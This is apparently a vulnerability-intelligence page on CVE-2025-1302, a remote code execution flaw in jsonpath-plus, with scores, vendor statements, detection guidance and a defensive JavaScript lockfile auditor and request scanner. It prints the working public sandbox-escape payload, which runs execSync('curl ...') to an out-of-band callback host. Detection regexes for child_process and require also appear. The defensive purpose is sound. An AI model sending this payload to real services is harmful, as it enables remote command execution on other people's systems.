CVE-2025-1302
Published: 2025-02-15
Priority: P1 · 85 · Critical · CVSS 3.1 9.8
CVSS 3.1 vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Tags: ITW · Exploit · VulnCheck KEV · Initial access
Exploited in the wild
EPSS: 10.70% (95.3rd percentile)
Versions of the package jsonpath-plus before 10.3.0 are vulnerable to Remote Code Execution (RCE) due to improper input sanitization. An attacker can execute arbitrary code on the system by exploiting the unsafe default usage of eval='safe' mode. Because `safe` is the default, any application that passes attacker-controlled JSONPath expressions to the library without setting `eval: false` is exposed; the public payload indexed below escapes the sandboxed evaluator by walking a constructor chain on a string literal (`''[['constructor']][['constructor']]`) to reach the `Function` constructor. **Note:** This is caused by an incomplete fix for [CVE-2024-21534](https://security.snyk.io/vuln/SNYK-JS-JSONPATHPLUS-7945884).
Detection & IOCs (extracted from sources)
Command (public payload): `$..[?(p="console.log(this.process.mainModule.require('child_process').execSync('curl {{interactsh-url}}').toString())";Ethan=''[['constructor']][['constructor']](p);Ethan())]`
- The exploit targets common JSON query endpoints via HTTP POST with Content-Type: application/json. Monitor POST requests to /query, /jsonpath, /api/query, /data, /parse, /filter and /expression containing JSONPath filter expressions with constructor references.
- Successful exploitation can be confirmed via an out-of-band DNS/HTTP callback (interactsh). Monitor for unexpected outbound DNS or HTTP requests originating from the Node.js process after it processes JSONPath queries.
- The vulnerability exploits the unsafe default `eval='safe'` mode in jsonpath-plus. Audit all deployments of jsonpath-plus for versions before 10.3.0 and check whether user-controlled input is passed to JSONPath evaluation.
- The payload leverages `this.process.mainModule.require('child_process')` to spawn OS commands. Alert on Node.js child_process spawning from within JSONPath evaluation contexts.
- Red Hat downgraded the impact to low for its products because no exploitable code paths exist in affected Red Hat products, and in OpenShift AI the jsonpath-plus dependency is never loaded.
- In Red Hat OpenShift AI, jsonpath-plus is a transitive dependency and the direct dependency's feature that requires it is not used, so the vulnerable code is never loaded.
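As an added example (not code from any of the advisory sources or from the jsonpath-plus project), the two checks the bullets above call for, written in JavaScript: a lockfile audit that reports jsonpath-plus installs below 10.3.0, including transitive copies, and a scanner over inbound JSON requests that flags JSONPath filter expressions carrying the sandbox-escape markers visible in the public payload. The request records, the lockfile snippet and the body key names (`path`, `expression`, ...) are constructed assumptions for the example; the indicator patterns are derived from the payload shown above, not taken from any vendor detection rule.

```javascript
// Added example: not from the advisory sources or the jsonpath-plus project.
// (1) audit a package-lock.json for jsonpath-plus < 10.3.0 and
// (2) flag JSON requests whose JSONPath filters carry the sandbox-escape
//     markers visible in the public payload (constructor chain, process,
//     require, child_process). All sample data below is constructed.

const FIXED_VERSION = [10, 3, 0]; // first release with the complete fix

// "v10.2.0" / "10.2.0-beta.1" -> [10, 2, 0]; pre-release tags are ignored.
function parseSemver(v) {
  const m = /^v?(\d+)\.(\d+)\.(\d+)/.exec(String(v).trim());
  if (!m) throw new Error(`unparseable version: ${v}`);
  return m.slice(1, 4).map(Number);
}

function compareSemver(a, b) {
  for (let i = 0; i < 3; i++) if (a[i] !== b[i]) return a[i] < b[i] ? -1 : 1;
  return 0;
}

// True when the installed version predates the 10.3.0 fix.
function isAffectedVersion(version) {
  return compareSemver(parseSemver(version), FIXED_VERSION) < 0;
}

// Walk the "packages" map of a lockfileVersion 2/3 package-lock.json, so
// nested (transitive) copies are caught as well as the top-level install.
function auditLockfile(lock) {
  const hits = [];
  for (const [path, entry] of Object.entries(lock.packages || {})) {
    if (path.endsWith('node_modules/jsonpath-plus') && entry.version
        && isAffectedVersion(entry.version)) {
      hits.push({ path, version: entry.version });
    }
  }
  return hits;
}

// Indicators taken from the structure of the public payload.
const SUSPICIOUS = [
  /constructor/i,                 // ''[['constructor']][['constructor']] reaches Function
  /\bprocess\b/,                  // this.process.mainModule
  /\brequire\s*\(/,               // .require('child_process')
  /child_process|execSync|spawn/, // OS command execution
];

// Endpoints named in the detection guidance; adjust to the application.
const WATCHED_PATHS = new Set(['/query', '/jsonpath', '/api/query', '/data',
                               '/parse', '/filter', '/expression']);

// Collect string values under the keys an API would plausibly use for the
// JSONPath expression (assumed key names, not a jsonpath-plus convention).
function candidatePaths(body) {
  const keys = new Set(['path', 'jsonpath', 'query', 'expression', 'filter']);
  const out = [];
  (function walk(v) {
    if (Array.isArray(v)) { v.forEach(walk); return; }
    if (v && typeof v === 'object') {
      for (const [k, val] of Object.entries(v)) {
        if (typeof val === 'string' && keys.has(k.toLowerCase())) out.push(val);
        else walk(val);
      }
    }
  })(body);
  return out;
}

// One request record -> alert object, or null when nothing is suspicious.
function scanRequest(req) {
  if (req.method !== 'POST' || !WATCHED_PATHS.has(req.path)) return null;
  if (!String(req.contentType).startsWith('application/json')) return null;
  let body;
  try { body = JSON.parse(req.body); } catch (e) { return null; }
  for (const p of candidatePaths(body)) {
    if (!p.includes('[?(')) continue; // only filter expressions are evaluated
    const indicators = SUSPICIOUS.filter(re => re.test(p)).map(re => re.source);
    if (indicators.length) return { endpoint: req.path, jsonpath: p, indicators };
  }
  return null;
}

function scanRequests(reqs) { return reqs.map(scanRequest).filter(Boolean); }

// Constructed samples: one benign query, one carrying the public payload.
const PAYLOAD = `$..[?(p="console.log(this.process.mainModule.require('child_process')` +
  `.execSync('curl {{interactsh-url}}').toString())";Ethan=''[['constructor']][['constructor']](p);Ethan())]`;
const SAMPLE_REQUESTS = [
  { method: 'POST', path: '/api/query', contentType: 'application/json',
    body: JSON.stringify({ path: '$.store.book[?(@.price < 10)].title', json: {} }) },
  { method: 'POST', path: '/query', contentType: 'application/json; charset=utf-8',
    body: JSON.stringify({ expression: PAYLOAD, json: {} }) },
  { method: 'GET', path: '/health', contentType: '', body: '' },
];
const SAMPLE_LOCK = { lockfileVersion: 3, packages: {
  'node_modules/jsonpath-plus': { version: '10.3.0' },
  'node_modules/some-lib/node_modules/jsonpath-plus': { version: '10.2.0' },
} };

console.log(auditLockfile(SAMPLE_LOCK));   // the nested 10.2.0 copy
console.log(scanRequests(SAMPLE_REQUESTS)); // one alert, for /query
```

The lockfile walk matters because, as the Red Hat notes above show, the affected package is often a transitive dependency: a top-level `npm ls jsonpath-plus` can report a fixed version while an older copy sits under another package. The request scanner is deliberately strict about `[?(` because only filter expressions reach the evaluator; a plain path such as `$.store.book[0].title` never executes code regardless of the `eval` setting.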
CVSS provenance
- nvd v3.1: 9.8 CRITICAL, CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
- nvd v4.0: 8.9 HIGH, CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
- ghsa: 9.8 CRITICAL
- osv: 9.8 CRITICAL
- vulncheck: 9.8 CRITICAL
- vendor_redhat: 9.8 CRITICAL
Red Hat
CVE-2025-1302 [CRITICAL] CWE-94 jsonpath-plus: Remote Code Execution in jsonpath-plus via Improper Input Sanitization
vendor_redhat · 2025-02-15 · CVSS 9.8
Same description as above (incomplete fix for CVE-2024-21534).
A flaw was found in jsonpath-plus. This vulnerability allows remote code execution (RCE) via improper input sanitization, exploiting the unsafe default usage of eval='safe' mode.
Statement: Red Hat's initial impact rating of critical has been downgraded to low. While the vulnerable code is technically still present within Red Hat pro
OSV
CVE-2025-1302 [CRITICAL] JSONPath Plus allows Remote Code Execution
osv · 2025-02-15 · CVSS 9.8
Same description as above (incomplete fix for CVE-2024-21534).
GHSA
CVE-2025-1302 [CRITICAL] CWE-94 JSONPath Plus allows Remote Code Execution
ghsa · 2025-02-15 · CVSS 9.8
Same description as above (incomplete fix for CVE-2024-21534).
VulnCheck
CVE-2025-1302 [CRITICAL] Improper Control of Generation of Code ('Code Injection')
vulncheck · 2025 · CVSS 9.8
Same description as above (incomplete fix for CVE-2024-21534).
Affected: JSONPath-plus / JSONPath-plus
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2025-11-19&host_type=src&vulnerability=cve-2025-1302; https://das
No detection rules found.
Nuclei
CVE-2025-1302 [CRITICAL] JSONPath Plus < 10.3.0 - Remote Code Execution
nuclei · CVSS 9.8
Same description as above (incomplete fix for CVE-2024-21534).
Template (only the info header is indexed; the request and matcher sections are not shown):

```yaml
id: CVE-2025-1302

info:
  name: JSONPath Plus < 10.3.0 - Remote Code Execution
  author: Jaenact
  severity: critical
  description: |
    Versions of the package jsonpath-plus before 10.3.0 are vulnerable to Remote Code Execution (RCE) due to improper input sanitization. An attacker can execute arbitrary code on the system by exploiting the unsafe default usage of eval='safe' mode. **Note:** This is caused by an incomplete fix for CVE-2024-21534.
```
No writeups or analysis indexed.
References:
- https://gist.github.com/nickcopi/11ba3cb4fdee6f89e02e6afae8db6456
- https://github.com/JSONPath-Plus/JSONPath/blob/8e4acf8aff5f446aa66323e12394ac5615c3b260/src/Safe-Script.js#L127
- https://github.com/JSONPath-Plus/JSONPath/commit/30942896d27cb8a806b965a5ca9ef9f686be24ee
- https://security.snyk.io/vuln/SNYK-JS-JSONPATHPLUS-8719585